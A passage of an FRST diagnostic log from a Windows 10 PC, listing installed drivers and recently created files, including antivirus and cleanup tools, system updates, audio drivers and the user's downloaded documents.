R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3732896 2016-08-04] (Intel® Corporation)
===================== Drivers (Whitelisted) ======================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R0 avc3; C:\WINDOWS\System32\DRIVERS\avc3.sys [1605376 2016-09-20] (BitDefender)
R3 avckf; C:\WINDOWS\System32\DRIVERS\avckf.sys [878072 2016-09-20] (BitDefender)
S0 bdelam; C:\WINDOWS\System32\drivers\bdelam.sys [23672 2016-03-14] (Bitdefender)
R1 bdfwfpf; C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf.sys [128400 2016-06-24] (BitDefender LLC)
R1 BDVEDISK; C:\WINDOWS\system32\DRIVERS\bdvedisk.sys [87912 2015-12-04] (BitDefender)
R3 dptf_cpu; C:\WINDOWS\System32\drivers\dptf_cpu.sys [52208 2016-09-25] (Intel Corporation)
R3 esif_lf; C:\WINDOWS\system32\DRIVERS\esif_lf.sys [260080 2016-09-25] (Intel Corporation)
R1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [77416 2017-01-20] ()
R0 gzflt; C:\WINDOWS\System32\DRIVERS\gzflt.sys [182944 2016-10-29] (BitDefender LLC)
R3 ibtusb; C:\WINDOWS\system32\DRIVERS\ibtusb.sys [345872 2016-05-26] (Intel Corporation)
R0 ignis; C:\WINDOWS\system32\DRIVERS\ignis.sys [309280 2016-11-17] (Bitdefender)
R2 MBAMChameleon; C:\WINDOWS\system32\drivers\MBAMChameleon.sys [176064 2017-02-01] (Malwarebytes)
R3 MBAMFarflt; C:\WINDOWS\system32\drivers\farflt.sys [110536 2017-02-01] (Malwarebytes)
R3 MBAMProtection; C:\WINDOWS\system32\drivers\mbam.sys [43968 2017-02-01] (Malwarebytes)
R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [251848 2017-02-01] (Malwarebytes)
S3 MBAMWebAccessControl; C:\windows\system32\drivers\mwac.sys [91584 2017-02-02] (Malwarebytes)
R3 MBAMWebProtection; C:\WINDOWS\system32\drivers\mwac.sys [91584 2017-02-02] (Malwarebytes)
S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
U5 Netwtw02; C:\Windows\System32\Drivers\Netwtw02.sys [6724368 2016-02-06] (Intel Corporation)
R3 Netwtw04; C:\WINDOWS\System32\drivers\Netwtw04.sys [7308560 2016-09-13] (Intel Corporation)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [935168 2016-01-19] (Realtek )
S3 RTSPER; C:\WINDOWS\system32\DRIVERS\RtsPer.sys [769752 2016-01-20] (Realsil Semiconductor Corporation)
S3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [413912 2016-01-20] (Realsil Semiconductor Corporation)
S3 SmbDrv; C:\WINDOWS\System32\drivers\Smb_driver_AMDASF.sys [58984 2016-02-22] (Synaptics Incorporated)
R3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [72824 2016-08-19] (Synaptics Incorporated)
R0 trufos; C:\WINDOWS\System32\DRIVERS\trufos.sys [520032 2016-06-22] (BitDefender S.R.L.)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
R3 WirelessButtonDriver64; C:\WINDOWS\system32\DRIVERS\WirelessButtonDriver64.sys [31656 2016-04-14] (HP)
U0 aswVmm; no ImagePath
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2017-02-01 21:13 - 2017-02-01 21:16 - 00002795 _____ C:\Users\Joseph\Downloads\Fixlog.txt
2017-02-01 21:11 - 2017-02-01 21:13 - 00000000 ____D C:\Users\Joseph\Documents\FRST911
2017-02-01 20:30 - 2017-02-02 10:14 - 00000000 ____D C:\Users\Joseph\AppData\LocalLow\Mozilla
2017-02-01 20:29 - 2017-02-01 20:36 - 00000000 ____D C:\Users\Joseph\AppData\Local\Mozilla
2017-02-01 20:29 - 2017-02-01 20:30 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Mozilla
2017-02-01 20:28 - 2017-02-01 20:28 - 00001239 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-02-01 20:28 - 2017-02-01 20:28 - 00001227 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-02-01 20:28 - 2017-02-01 20:28 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-02-01 20:28 - 2017-02-01 20:28 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-02-01 20:26 - 2017-02-01 20:27 - 00245424 _____ C:\Users\Joseph\Downloads\Firefox Setup Stub 51.0.1.exe
2017-02-01 18:24 - 2017-02-01 18:25 - 55566792 _____ (Malwarebytes ) C:\Users\Joseph\Downloads\mb3-setup-cb.NT-3.0.6.1469.exe
2017-02-01 17:47 - 2017-02-01 21:33 - 00037463 _____ C:\Users\Joseph\Downloads\Addition.txt
2017-02-01 17:45 - 2017-02-02 12:02 - 00024572 _____ C:\Users\Joseph\Downloads\FRST.txt
2017-02-01 17:45 - 2017-02-02 12:02 - 00000000 ____D C:\FRST
2017-02-01 17:43 - 2017-02-01 17:45 - 02420736 _____ (Farbar) C:\Users\Joseph\Downloads\FRST64.exe
2017-02-01 17:20 - 2017-02-01 17:27 - 00000556 _____ C:\Users\Joseph\Desktop\JRT.txt
2017-02-01 17:07 - 2017-02-01 21:17 - 00002361 _____ C:\bdlog.txt
2017-02-01 17:02 - 2017-02-01 18:10 - 00000000 ____D C:\AdwCleaner
2017-02-01 16:58 - 2017-02-01 17:15 - 01663040 _____ (Malwarebytes) C:\Users\Joseph\Downloads\JRT (1).exe
2017-02-01 16:56 - 2017-02-01 16:58 - 01663040 _____ (Malwarebytes) C:\Users\Joseph\Downloads\JRT.exe
2017-02-01 16:54 - 2017-02-01 17:01 - 03988944 _____ C:\Users\Joseph\Downloads\AdwCleaner.exe
2017-02-01 16:52 - 2017-02-01 16:52 - 00040137 _____ C:\ProgramData\dm.1485985887.bdinstall.bin
2017-02-01 09:33 - 2017-02-01 09:33 - 00000385 _____ C:\WINDOWS\system32\user_gensett.xml
2017-02-01 08:54 - 2017-02-01 08:54 - 00000000 ____D C:\Users\Joseph\AppData\Temp
2017-02-01 08:52 - 2017-02-01 08:52 - 00056949 _____ C:\ProgramData\dm.1485956857.bdinstall.bin
2017-02-01 08:51 - 2017-02-01 08:51 - 00000000 ____D C:\ProgramData\Bitdefender Device Management
2017-02-01 08:47 - 2017-02-01 18:34 - 00003406 _____ C:\WINDOWS\System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C
2017-02-01 08:47 - 2017-02-01 08:47 - 00403991 _____ C:\ProgramData\cl.1485956260.bdinstall.bin
2017-02-01 08:45 - 2017-02-01 08:45 - 00002310 _____ C:\Users\Public\Desktop\Bitdefender 2017.lnk
2017-02-01 08:45 - 2017-02-01 08:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bitdefender 2017
2017-02-01 08:45 - 2017-02-01 08:45 - 00000000 ____D C:\ProgramData\BDLogging
2017-02-01 08:44 - 2016-09-20 04:17 - 01605376 _____ (BitDefender) C:\WINDOWS\system32\Drivers\avc3.sys
2017-02-01 08:44 - 2016-09-20 04:16 - 00878072 _____ (BitDefender) C:\WINDOWS\system32\Drivers\avckf.sys
2017-02-01 08:44 - 2016-03-14 22:04 - 00023672 _____ (Bitdefender) C:\WINDOWS\system32\Drivers\bdelam.sys
2017-02-01 08:44 - 2015-12-04 19:27 - 00087912 _____ (BitDefender) C:\WINDOWS\system32\Drivers\bdvedisk.sys
2017-02-01 08:44 - 2007-04-11 11:11 - 00511328 _____ (Microsoft Corporation) C:\WINDOWS\capicom.dll
2017-02-01 08:43 - 2017-02-01 08:51 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Bitdefender
2017-02-01 08:43 - 2016-11-17 05:00 - 00309280 _____ (Bitdefender) C:\WINDOWS\system32\Drivers\ignis.sys
2017-02-01 08:38 - 2017-02-01 18:34 - 00000000 ____D C:\ProgramData\Bitdefender
2017-02-01 08:38 - 2017-02-01 08:47 - 00000000 ____D C:\Program Files\Bitdefender
2017-02-01 08:38 - 2016-10-29 08:54 - 00182944 _____ (BitDefender LLC) C:\WINDOWS\system32\Drivers\gzflt.sys
2017-02-01 08:38 - 2016-06-22 14:40 - 00520032 _____ (BitDefender S.R.L.) C:\WINDOWS\system32\Drivers\trufos.sys
2017-02-01 08:37 - 2017-02-01 08:38 - 00000000 ____D C:\Program Files\Common Files\Bitdefender
2017-02-01 08:37 - 2017-02-01 08:37 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\QuickScan
2017-02-01 08:29 - 2017-02-01 08:29 - 00003794 _____ C:\WINDOWS\System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864
2017-02-01 08:27 - 2017-02-02 12:05 - 00000000 ____D C:\Program Files\Bitdefender Agent
2017-02-01 08:27 - 2017-02-01 08:27 - 00047353 _____ C:\ProgramData\agent.1485955633.bdinstall.bin
2017-02-01 08:27 - 2017-02-01 08:27 - 00000000 ____D C:\ProgramData\Bitdefender Agent
2017-02-01 08:26 - 2017-02-01 08:27 - 11842648 _____ C:\Users\Joseph\Downloads\bitdefender_windows_43ea11d5-575e-4d5e-84a9-5683192df898.exe
2017-01-31 23:27 - 2017-01-31 23:27 - 00000017 _____ C:\Users\Joseph\AppData\Local\resmon.resmoncfg
2017-01-31 23:13 - 2017-01-31 23:13 - 00251848 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\132034FB.sys
2017-01-31 15:37 - 2017-01-31 15:37 - 01923396 _____ C:\Users\Joseph\Downloads\hospital visit.pdf
2017-01-30 20:58 - 2017-01-30 20:59 - 02059056 _____ (The Nielsen Company) C:\Users\Joseph\Downloads\ShopTracker_033D6D4A68A315B4A000 (2).exe
2017-01-28 01:57 - 2017-01-28 01:57 - 00000000 ____D C:\WINDOWS\System32\Tasks\AVAST Software
2017-01-28 01:57 - 2017-01-28 01:57 - 00000000 ____D C:\Program Files\Common Files\AV
2017-01-25 00:02 - 2016-12-21 02:08 - 00142848 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe
2017-01-25 00:02 - 2016-12-20 23:44 - 00120320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe
2017-01-24 23:47 - 2017-01-21 21:14 - 00485032 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2017-01-24 17:47 - 2017-01-24 17:47 - 10697014 _____ C:\Users\Joseph\Downloads\FDN_Glyphosate_FoodTesting_Report_p2016.pdf
2017-01-24 13:33 - 2017-01-24 13:33 - 00083650 _____ C:\Users\Joseph\Downloads\visit 1-23.pdf
2017-01-21 13:55 - 2017-02-01 08:34 - 00000000 ____D C:\ProgramData\AVAST Software
2017-01-21 13:55 - 2017-01-21 13:55 - 06253640 _____ (AVAST Software) C:\Users\Joseph\Downloads\avast_free_antivirus_setup_online_cnet_2.exe
2017-01-19 21:09 - 2017-01-19 21:09 - 00151143 _____ C:\Users\Joseph\Downloads\PDF_Bill (2).pdf
2017-01-19 21:09 - 2017-01-19 21:09 - 00150985 _____ C:\Users\Joseph\Downloads\PDF_Bill (3).pdf
2017-01-19 21:08 - 2017-01-19 21:08 - 00199440 _____ C:\Users\Joseph\Downloads\PDF_Bill (1).pdf
2017-01-19 21:06 - 2017-01-19 21:06 - 00001115 _____ C:\Users\Joseph\Downloads\AccountEnergyUsage.csv
2017-01-19 20:26 - 2017-01-19 20:26 - 00223944 _____ C:\Users\Joseph\Downloads\djcxMjYtODA5MC04MDkxLTgzNjMtT0lCMS00MDRGQUFCQi0wLTIyMzk0NC00Nzk2ODE3LTIyMzk0NC04NS02OC0wLTE2OS0wLV4BUAExNzA5NgEyMzYxNAE0AUNCQwFDQkMwMQEyMDA0LTAwMDEBQUNDRVNTIE5BVElPTkFMIENPUlBPUkFUSU9OIFBST0ZJVCBTSEFSSU5HIFBMQU4BTkEBUk.pdf
2017-01-19 14:36 - 2017-01-19 14:36 - 00000000 ____D C:\Users\Joseph\AppData\LocalLow\Temp
2017-01-18 22:07 - 2017-01-18 22:07 - 00676419 _____ C:\Users\Joseph\Downloads\137230-201711873115438.pdf
2017-01-15 18:00 - 2017-01-15 18:00 - 00151143 _____ C:\Users\Joseph\Downloads\PDF_Bill.pdf
2017-01-15 16:33 - 2017-01-15 16:33 - 00086004 _____ C:\Users\Joseph\Downloads\DS82_Complete (1).pdf
2017-01-15 16:15 - 2017-01-15 16:15 - 00683112 _____ C:\Users\Joseph\Downloads\taxReturn (1).tax2016
2017-01-15 16:11 - 2017-01-15 16:24 - 01487502 _____ C:\Users\Joseph\Downloads\taxReturn.tax2016
2017-01-15 15:50 - 2017-01-15 15:50 - 06281998 _____ C:\Users\Joseph\Downloads\C2 Artist Mini-Posters.pdf
2017-01-15 15:44 - 2017-01-15 15:44 - 00002529 _____ C:\Users\Public\Desktop\TurboTax 2016.lnk
2017-01-15 15:44 - 2017-01-15 15:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TurboTax 2016
2017-01-15 15:29 - 2017-01-15 15:30 - 121060464 _____ C:\Users\Joseph\Downloads\turbotax_deluxe_2016_windows.exe
2017-01-14 21:56 - 2017-01-14 21:56 - 00085948 _____ C:\Users\Joseph\Downloads\DS82_Complete.pdf
2017-01-14 11:22 - 2017-01-14 11:22 - 00235450 _____ C:\Users\Joseph\Downloads\CAMP_CONNECTION_CARNIVAL_flier2106.pdf
2017-01-13 15:55 - 2017-01-13 15:53 - 72520712 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RCoRes64.dat
2017-01-13 15:55 - 2017-01-13 15:53 - 07704619 _____ C:\WINDOWS\system32\Drivers\RTAIODAT.DAT
2017-01-13 15:55 - 2017-01-13 15:53 - 03204096 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtPgEx64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 03014144 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RTSnMg64.cpl
2017-01-13 15:55 - 2017-01-13 15:53 - 02706856 _____ (DTS, Inc.) C:\WINDOWS\system32\sltech64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 02201088 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RCoInstII64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 01615656 _____ (Conexant Systems Inc.) C:\WINDOWS\system32\CX64APO.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 01529136 _____ (Conexant Systems Inc.) C:\WINDOWS\system32\CX64Proxy.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 01435136 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRRPTR64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 01360512 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RTCOM64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 01003320 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SEHDHF64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00984912 _____ (DTS, Inc.) C:\WINDOWS\system32\sl3apo64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00865912 _____ (Sound Research, Corp.) C:\WINDOWS\SysWOW64\SEHDHF32.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00859216 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SEHDRA64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00850400 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SECOMN64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00721800 _____ (Sound Research, Corp.) C:\WINDOWS\SysWOW64\SECOMN32.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00689872 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtDataProc64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00574752 _____ (Andrea Electronics Corporation) C:\WINDOWS\system32\AERTAC64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00532376 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSTSX64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00499152 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SEAPO64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00467152 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRAPO64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00438688 _____ (Conexant Systems, Inc.) C:\WINDOWS\system32\CAF64APO2.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00387312 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEP64A.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00381400 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRCOM64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00343704 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtlCPAPI64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00341144 _____ (Synopsys, Inc.) C:\WINDOWS\SysWOW64\SRCOM.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00341144 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRCOM.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00321712 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RP3DHT64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00321712 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RP3DAA64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00258864 _____ (TODO: <Company name>) C:\WINDOWS\system32\slprp64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00214832 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEED64A.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00166200 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSWOW64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00122320 _____ (Real Sound Lab SIA) C:\WINDOWS\system32\CONEQMSAPOGUILibrary.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00118592 _____ (Andrea Electronics Corporation) C:\WINDOWS\system32\AERTAR64.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00112488 _____ (Conexant Systems, Inc.) C:\WINDOWS\system32\Caf64api.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00110984 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEL64A.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00088344 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEG64A.dll
2017-01-13 15:55 - 2017-01-13 15:53 - 00005604 _____ C:\WINDOWS\system32\cxapo.lncs
2017-01-13 15:55 - 2017-01-13 15:53 - 00000736 _____ C:\WINDOWS\system32\cxapo.prop
2017-01-11 23:08 - 2017-01-11 23:08 - 02604526 _____ C:\Users\Joseph\Downloads\AAS-L2-Student-Packet-Sample.pdf
2017-01-11 22:56 - 2017-01-11 22:56 - 02399782 _____ C:\Users\Joseph\Downloads\AAS-L1-Student-Packet-Sample.pdf
2017-01-11 22:55 - 2017-01-11 22:55 - 05323693 _____ C:\Users\Joseph\Downloads\AAR-L1-2ndEd-CobwebtheCat-Sample.pdf
2017-01-11 15:10 - 2017-01-11 15:10 - 05432492 _____ C:\Users\Joseph\Downloads\01-08-2017.pdf
2017-01-11 15:07 - 2017-01-11 15:07 - 00106459 _____ C:\Users\Joseph\Downloads\bill_10912246.pdf
2017-01-10 22:58 - 2016-12-21 00:09 - 00263472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Storage.ApplicationData.dll
2017-01-10 22:58 - 2016-12-21 00:01 - 20969928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-01-10 22:58 - 2016-12-20 23:46 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe
2017-01-10 22:58 - 2016-12-20 23:43 - 00285184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BlockedShutdown.dll
2017-01-10 22:58 - 2016-12-20 23:41 - 00253952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BioFeedback.dll
2017-01-10 22:58 - 2016-12-20 23:40 - 00557568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2017-01-10 22:58 - 2016-12-20 23:40 - 00318976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpencom.dll
2017-01-10 22:58 - 2016-12-20 23:40 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncSettings.dll
2017-01-10 22:58 - 2016-12-20 23:40 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2017-01-10 22:58 - 2016-12-20 23:39 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2017-01-10 22:58 - 2016-12-20 23:38 - 00866816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Cred.dll
2017-01-10 22:58 - 2016-12-20 23:34 - 07626752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-01-10 22:58 - 2016-12-20 23:30 - 05398016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aclui.dll
2017-01-10 22:58 - 2016-12-20 23:30 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-01-10 22:58 - 2016-12-20 23:25 - 07469056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2017-01-10 22:58 - 2016-12-20 23:22 - 01883648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2017-01-10 22:58 - 2016-12-20 23:22 - 00860672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2017-01-10 22:58 - 2016-12-14 00:08 - 00341344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2017-01-10 22:58 - 2016-12-14 00:06 - 00509792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2017-01-10 22:58 - 2016-12-14 00:01 - 01557808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
2017-01-10 22:58 - 2016-12-13 23:45 - 00147968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32k.sys
2017-01-10 22:58 - 2016-12-13 23:42 - 00167424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinSCard.dll
2017-01-10 22:58 - 2016-12-13 23:36 - 00074752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
2017-01-10 22:58 - 2016-12-13 23:35 - 00712192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2017-01-10 22:58 - 2016-12-13 23:35 - 00553984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptui.dll
2017-01-10 22:58 - 2016-12-13 23:22 - 02998272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-01-10 22:58 - 2016-12-13 23:22 - 02748416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpcore.dll
2017-01-10 22:57 - 2016-12-21 00:59 - 00218976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offlinesam.dll
2017-01-10 22:57 - 2016-12-21 00:02 - 03892864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2017-01-10 22:57 - 2016-12-21 00:02 - 01852720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2017-01-10 22:57 - 2016-12-21 00:02 - 01360464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll
2017-01-10 22:57 - 2016-12-21 00:02 - 01277344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfasfsrcsnk.dll
2017-01-10 22:57 - 2016-12-21 00:02 - 01201872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2017-01-10 22:57 - 2016-12-21 00:02 - 00980832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll
2017-01-10 22:57 - 2016-12-20 23:41 - 00231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll
2017-01-10 22:57 - 2016-12-20 23:39 - 01300480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2017-01-10 22:57 - 2016-12-20 23:35 - 04612608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2017-01-10 22:57 - 2016-12-20 23:35 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\indexeddbserver.dll
2017-01-10 22:57 - 2016-12-20 23:33 - 19413504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-01-10 22:57 - 2016-12-20 23:32 - 19417600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-01-10 22:57 - 2016-12-20 23:27 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll
2017-01-10 22:57 - 2016-12-20 23:26 - 01155072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVP9DEC.dll
2017-01-10 22:57 - 2016-12-20 23:25 - 06474752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspaint.exe
2017-01-10 22:57 - 2016-12-20 23:24 - 06044160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-01-10 22:57 - 2016-12-20 23:24 - 05061120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2017-01-10 22:57 - 2016-12-20 23:24 - 03733504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-01-10 22:57 - 2016-12-20 23:24 - 00886272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-01-10 22:57 - 2016-12-14 00:21 - 02206496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msmpeg2vdec.dll
2017-01-10 22:57 - 2016-12-14 00:01 - 00382784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AUDIOKSE.dll
2017-01-10 22:57 - 2016-12-14 00:01 - 00076984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\remoteaudioendpoint.dll
2017-01-10 22:57 - 2016-12-13 23:46 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
2017-01-10 22:57 - 2016-12-13 23:40 - 00231424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll
2017-01-10 22:57 - 2016-12-13 23:40 - 00104448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.UI.Logon.ProxyStub.dll
2017-01-10 22:57 - 2016-12-13 23:38 - 13869056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2017-01-10 22:57 - 2016-12-13 23:38 - 00213504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.CredDialogController.dll
2017-01-10 22:57 - 2016-12-13 23:35 - 00755712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2017-01-10 22:57 - 2016-12-13 23:32 - 00806400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3D12.dll
2017-01-10 22:57 - 2016-12-13 23:32 - 00497152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LogonController.dll
2017-01-10 22:57 - 2016-11-02 07:01 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2017-01-10 22:57 - 2016-08-01 23:30 - 00822784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2017-01-10 22:48 - 2016-12-21 02:49 - 00328008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Storage.ApplicationData.dll
2017-01-10 22:47 - 2016-12-21 03:08 - 00136032 _____ (Microsoft Corporation) C:\WINDOWS\system32\ImplatSetup.dll
2017-01-10 22:47 - 2016-12-21 03:04 - 07816032 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-01-10 22:47 - 2016-12-21 02:43 - 04130440 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2017-01-10 22:47 - 2016-12-21 02:43 - 01454504 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetsrc.dll
2017-01-10 22:47 - 2016-12-21 02:43 - 01071736 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll
2017-01-10 22:47 - 2016-12-21 02:43 - 00092512 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
